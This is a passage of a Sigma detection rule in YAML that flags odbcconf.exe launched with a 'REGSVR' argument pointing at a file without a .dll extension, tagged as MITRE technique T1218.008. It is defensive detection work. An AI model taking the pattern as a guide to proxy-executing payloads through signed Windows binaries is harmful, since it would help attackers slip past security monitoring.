    - attack.stealth
    - attack.t1218.008
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\odbcconf.exe'
        - OriginalFileName: 'odbcconf.exe'
    selection_cli:
        # Note: The "/A" flag is not required to call a specific action
        CommandLine|contains: 'REGSVR '
    filter_main_dll_ext:
        CommandLine|contains: '.dll'
    condition: all of selection_* and not 1 of filter_main_*
falsepositives:
    - Unlikely
level: high